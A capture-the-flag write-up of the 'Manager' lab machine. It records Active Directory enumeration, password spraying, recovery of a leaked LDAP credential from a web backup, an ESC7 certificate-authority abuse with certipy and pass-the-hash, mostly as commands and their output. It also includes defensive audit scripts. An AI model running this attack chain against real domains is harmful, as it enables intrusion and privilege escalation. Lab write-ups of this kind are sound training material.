# Manager
Medium machine, Oct 21, 2023
Tags: #User #kerbrute #MSSQL #attack-2 #Vulnerable #nmap #crackmapexec #smbclient #certipy #mssqlclient

## User
**User:** raven@manager.htb
**Password:** R4v3nBe5tD3veloP3r!123
Got some usernames from kerbrute (see User Enumeration under System Files).
Anonymous SMB login works (Guest) against DC01.
### Kerbrute Enumeration
### Mssql
### Website Backup
```text
└──╼ $ls -la
total 1072
drwxr-xr-x 1 hat hat     198 Oct 22 06:44 .
drwxr-xr-x 1 hat hat     142 Oct 22 06:44 ..
-rw-r--r-- 1 hat hat    5386 Jul 27 05:32 about.html
-rw-r--r-- 1 hat hat    5317 Jul 27 05:32 contact.html
drwxr-xr-x 1 hat hat     118 Oct 22 06:44 css
drwxr-xr-x 1 hat hat     510 Oct 22 06:44 images
-rw-r--r-- 1 hat hat   18203 Jul 27 05:32 index.html
drwxr-xr-x 1 hat hat      62 Oct 22 06:44 js
-rw-r--r-- 1 hat hat     698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 hat hat    7900 Jul 27 05:32 service.html
-rw-r--r-- 1 hat hat 1045328 Oct 22 06:43 website-backup-27-07-23-old.zip
└──╼ $cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=manager,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>raven@manager.htb</user>
      <password>R4v3nBe5tD3veloP3r!123</password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
  <search type="full">
    <dir-list>
      <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
    </dir-list>
  </search>
</ldap-conf>
```
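The finding above is a plaintext LDAP bind credential inside a dotfile shipped in a web-root backup. As an added example (not part of this writeup and not from any tool it uses), the Python below walks a backup archive, picks out `ldap-conf` documents of the shape seen in `.old-conf.xml`, and reports what a reviewer would flag: a stored bind password, plain LDAP on 389, and LDAPS disabled. The in-memory archive and the password value in it are constructed placeholders, not the real backup.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Constructed sample modelled on the .old-conf.xml shape from the backup;
# the password is a placeholder, not the real value.
SAMPLE_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=manager,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>raven@manager.htb</user>
      <password>PLACEHOLDER-NOT-THE-REAL-PASSWORD</password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
</ldap-conf>
"""


def audit_ldap_conf(xml_text: str) -> list[str]:
    """Return the weaknesses found in one ldap-conf document."""
    findings = []
    server = ET.fromstring(xml_text.encode("utf-8")).find("server")
    if server is None:
        return ["no <server> element, not an ldap-conf document"]

    user = (server.findtext("access-user/user") or "").strip()
    password = (server.findtext("access-user/password") or "").strip()
    if password:
        findings.append(f"bind password stored in plaintext for {user or '<unknown user>'}")

    # open-port enabled on 389 means the simple bind travels unencrypted unless StartTLS is used
    open_port = server.find("open-port")
    if (open_port is not None and open_port.get("enabled") == "true"
            and (open_port.text or "").strip() == "389"):
        findings.append("plain LDAP on 389 enabled; the bind credential crosses the wire unencrypted")

    secure_port = server.find("secure-port")
    if secure_port is None or secure_port.get("enabled") != "true":
        findings.append("LDAPS (secure-port) disabled")
    return findings


def build_sample_backup() -> bytes:
    """Constructed in-memory zip mimicking website-backup-*.zip with a hidden config inside."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.html", "<html><body>site</body></html>")
        zf.writestr(".old-conf.xml", SAMPLE_CONF)
    return buf.getvalue()


def scan_backup(zip_bytes: bytes) -> dict[str, list[str]]:
    """Audit every ldap-conf XML member of a backup archive; returns {member: findings}."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".xml"):
                continue
            data = zf.read(name).decode("utf-8", errors="replace")
            if "<ldap-conf" not in data:
                continue
            results[name] = audit_ldap_conf(data)
    return results


if __name__ == "__main__":
    for member, findings in scan_backup(build_sample_backup()).items():
        print(member)
        for finding in findings:
            print("  -", finding)
```

The point of checking archives rather than only loose files is that this backup sat in the web root and was readable through `xp_dirtree` and the web server; a dotfile hidden inside it is exactly what a directory listing of the deployed site misses.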
```text
└──╼ $evil-winrm -u raven -p 'R4v3nBe5tD3veloP3r!123' -i manager.htb
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> ls
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> ls
    Directory: C:\Users\Raven\Desktop
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        10/19/2023  11:25 AM             34 user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
afd29645e7cf9fefb57c1bfc57a89541
```
## Root
### Raven
#### Resources
- https://www.tarlogic.com/blog/ad-cs-esc7-attack/
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalationattack-2
We have dangerous permissions that allow us to execute an ESC7 attack:
- ManageCA allows a user to change the CA’s settings, which, among other things, can be used to turn on SAN (Subject Alternative Name) for all the templates managed by the CA. SAN is an extension that allows a user to request a certificate linked to additional identities. This is the key behind the ESC1 attack, because if a template has this extension, it is possible to request a valid certificate for any domain account. As we said, turning this on at CA level makes the extension available to all the CA’s templates even if they don’t have it individually (allowing for the ESC6 attack).
#### ESC7 Attack
See the HackTricks link under Resources.
First we need the ManageCertificates permission in addition to our ManageCA right; ManageCA lets us add ourselves as a certificate officer, which is what grants it.
#### Before
```text
ManageCertificates : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
ManageCa           : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
                     MANAGER.HTB\Raven
```
#### Enable ManageCertificates
```text
└──╼ $certipy ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -password $(cat passwords)
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```
#### After
```text
ManageCertificates : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
                     MANAGER.HTB\Raven
ManageCa           : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
                     MANAGER.HTB\Raven
```
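The whole ESC7 chain hinges on one right: ManageCA lets Raven add herself as an officer, and the Before/After listings show exactly that change. As an added example (not from the writeup and not from Certipy), the Python below parses the `ManageCa` / `ManageCertificates` permission blocks in the layout Certipy prints (the same layout appears under Permissions in the `certipy find` output further down), flags any holder outside an expected tier-0 baseline, and diffs two snapshots so the `-add-officer` step shows up as an added principal. The baseline groups are an assumption for this domain; the two listings are the ones from this page.

```python
import re

# Expected tier-0 holders of CA-level rights in this domain (assumption for the example).
BASELINE_HOLDERS = {
    "MANAGER.HTB\\Administrators",
    "MANAGER.HTB\\Domain Admins",
    "MANAGER.HTB\\Enterprise Admins",
}
RIGHTS_OF_INTEREST = ("ManageCa", "ManageCertificates")
# Continuation lines carry only a DOMAIN\principal; anything else ends the block.
PRINCIPAL_RE = re.compile(r"^[\w.\-]+\\[\w .\-$]+$")

# The two listings from the writeup (before and after the -add-officer step).
BEFORE = r"""
ManageCertificates : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
ManageCa           : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
                     MANAGER.HTB\Raven
"""
AFTER = r"""
ManageCertificates : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
                     MANAGER.HTB\Raven
ManageCa           : MANAGER.HTB\Administrators
                     MANAGER.HTB\Domain Admins
                     MANAGER.HTB\Enterprise Admins
                     MANAGER.HTB\Raven
"""


def parse_ca_rights(text: str) -> dict[str, list[str]]:
    """Map each CA right of interest to its holders, following Certipy's
    'Right : first holder' line plus one holder per following line."""
    rights: dict[str, list[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if " : " in line:
            key, _, value = line.partition(" : ")
            current = key.strip() if key.strip() in RIGHTS_OF_INTEREST else None
            if current:
                rights[current] = [value.strip()]
        elif current and PRINCIPAL_RE.match(line):
            rights[current].append(line)
        else:
            current = None  # a header such as "[!] Vulnerabilities" ends the block
    return rights


def unexpected_holders(rights, baseline=BASELINE_HOLDERS):
    """Principals holding a CA-level right outside the expected admin groups."""
    out = {}
    for right, holders in rights.items():
        extra = sorted(set(holders) - baseline)
        if extra:
            out[right] = extra
    return out


def diff_snapshots(before_text: str, after_text: str):
    """Holders added or removed per right between two snapshots."""
    before, after = parse_ca_rights(before_text), parse_ca_rights(after_text)
    changes = {}
    for right in RIGHTS_OF_INTEREST:
        old, new = set(before.get(right, [])), set(after.get(right, []))
        if old != new:
            changes[right] = {"added": sorted(new - old), "removed": sorted(old - new)}
    return changes


if __name__ == "__main__":
    print("non-baseline holders before:", unexpected_holders(parse_ca_rights(BEFORE)))
    print("changes after -add-officer:", diff_snapshots(BEFORE, AFTER))
```

Run against the Before listing alone, the baseline check already reports Raven under `ManageCa`, which is the finding Certipy labels ESC7; the snapshot diff is what catches the officer being added afterwards. On the CA host itself, that same ACL change is recorded as Security event 4882 (security permissions for Certificate Services changed) when Certification Services auditing is enabled.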
So we can now submit our request for the administrator.pfx.
#### Validating the request for the pfx
```text
└──╼ $certipy req -u raven -p $(cat passwords) -target manager.htb -ca manager-DC01-CA -template SubCA -upn administrator@manager.htb
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 26
Would you like to save the private key? (y/N) y
[*] Saved private key to 26.key
[-] Failed to request certificate
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $certipy ca -u raven -p $(cat passwords) -target manager.htb -ca manager-DC01-CA -issue-request 26
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $certipy req -u raven -p $(cat passwords) -target manager.htb -ca manager-DC01-CA -retrieve 26
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 26
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '26.key'
[*] Saved certificate and private key to 'administrator.pfx'
```
Now we have the administrator.pfx!
#### Getting Administrator Hash
```text
└──╼ $certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $evil-winrm -u Administrator -H ae5064c2f62317332c88629e025924ef -i manager.htb
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
    Directory: C:\Users\Administrator\Desktop
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        10/19/2023  11:25 AM             34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b387cd4b5a9759648f1f6752dba697f4
```
## System Files
Here is a log of all (potentially) relevant files.
### Tools
#### nmap
#### kerbrute
##### User Enumeration
```text
└──╼ $~/htb/tools/kerbrute -d manager --dc dc01.manager.htb userenum /opt/SecLists/Usernames/xato-net-10-million-usernames.txt
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/21/23 - Ronnie Flathers @ropnop
2023/10/21 17:36:59 > Using KDC(s):
2023/10/21 17:36:59 > dc01.manager.htb:88
2023/10/21 17:37:00 > [+] VALID USERNAME: ryan@manager
2023/10/21 17:37:01 > [+] VALID USERNAME: guest@manager
2023/10/21 17:37:02 > [+] VALID USERNAME: cheng@manager
2023/10/21 17:37:03 > [+] VALID USERNAME: raven@manager
2023/10/21 17:37:07 > [+] VALID USERNAME: administrator@manager
2023/10/21 17:37:18 > [+] VALID USERNAME: Ryan@manager
2023/10/21 17:37:23 > [+] VALID USERNAME: Raven@manager
2023/10/21 17:37:28 > [+] VALID USERNAME: operator@manager
2023/10/21 17:38:13 > [+] VALID USERNAME: Guest@manager
2023/10/21 17:38:14 > [+] VALID USERNAME: Administrator@manager
2023/10/21 17:38:47 > [+] VALID USERNAME: Cheng@manager
2023/10/21 17:40:21 > [+] VALID USERNAME: jinwoo@manager
2023/10/21 17:40:37 > [+] VALID USERNAME: RYAN@manager
2023/10/21 17:41:45 > [+] VALID USERNAME: RAVEN@manager
2023/10/21 17:41:47 > [+] VALID USERNAME: GUEST@manager
```
##### Password Spraying
```text
└──╼ $~/htb/tools/kerbrute passwordspray users --user-as-pass -d manager.htb --dc dc01.manager.htb
    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/22/23 - Ronnie Flathers @ropnop
2023/10/22 05:58:42 > Using KDC(s):
2023/10/22 05:58:42 > dc01.manager.htb:88
2023/10/22 05:58:42 > [+] VALID LOGIN: operator@manager.htb:operator
2023/10/22 05:58:42 > Done! Tested 31 logins (1 successes) in 0.397 seconds
```
#### crackmapexec
##### RID Bruteforcing
```text
└──╼ $ crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
SMB manager.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB manager.htb 445 DC01 [+] manager.htb\anonymous:
SMB manager.htb 445 DC01 [+] Brute forcing RIDs
SMB manager.htb 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB manager.htb 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB manager.htb 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB manager.htb 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB manager.htb 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB manager.htb 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB manager.htb 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB manager.htb 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB manager.htb 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB manager.htb 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB manager.htb 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB manager.htb 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB manager.htb 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB manager.htb 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB manager.htb 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB manager.htb 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB manager.htb 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB manager.htb 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB manager.htb 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB manager.htb 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB manager.htb 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB manager.htb 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB manager.htb 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB manager.htb 445 DC01 1119: MANAGER\Operator (SidTypeUser)
```
#### smbclient
##### Share List
```text
└──╼ $smbclient -U manager/annonymous -N -L //dc01.manager.htb
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
#### certipy
##### Operator Certificate
```text
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $certipy req -u operator@manager.htb -p operator -target dc01.manager.htb -ca manager-DC01-CA
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Operator@manager.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-1119'
[*] Saved certificate and private key to 'operator.pfx'
└──╼ $certipy auth -pfx operator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: operator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'operator.ccache'
[*] Trying to retrieve NT hash for 'operator'
[*] Got hash for 'operator@manager.htb': aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df
```
##### Template List - Raven
```text
└──╼ $certipy ca -u raven -p $(cat passwords) -target dc01.manager.htb -list-templates -ca manager-DC01-CA
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-DC01-CA':
    SubCA
    DirectoryEmailReplication
    DomainControllerAuthentication
    KerberosAuthentication
    EFSRecovery
    EFS
    DomainController
    WebServer
    Machine
    User
    Administrator
```
##### Vulnerable Templates
```text
└──╼ $certipy find -u raven -p $(cat passwords) -target dc01.manager.htb -stdout -vulnerable
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
```
#### mssqlclient
```text
└──╼ $mssqlclient.py manager.htb/operator:operator@dc01.manager.htb -windows-auth
SQL (MANAGER\Operator guest@msdb)> xp_dirtree C:\inetpub\wwwroot
[%] exec master.sys.xp_dirtree 'C:\inetpub\wwwroot',1,1
subdirectory                      depth   file
-------------------------------   -----   ----
about.html                            1      1
contact.html                          1      1
css                                   1      0
images                                1      0
index.html                            1      1
js                                    1      0
service.html                          1      1
web.config                            1      1
website-backup-27-07-23-old.zip       1      1
```
## Flags
### User Flag
afd29645e7cf9fefb57c1bfc57a89541
### Root Flag
b387cd4b5a9759648f1f6752dba697f4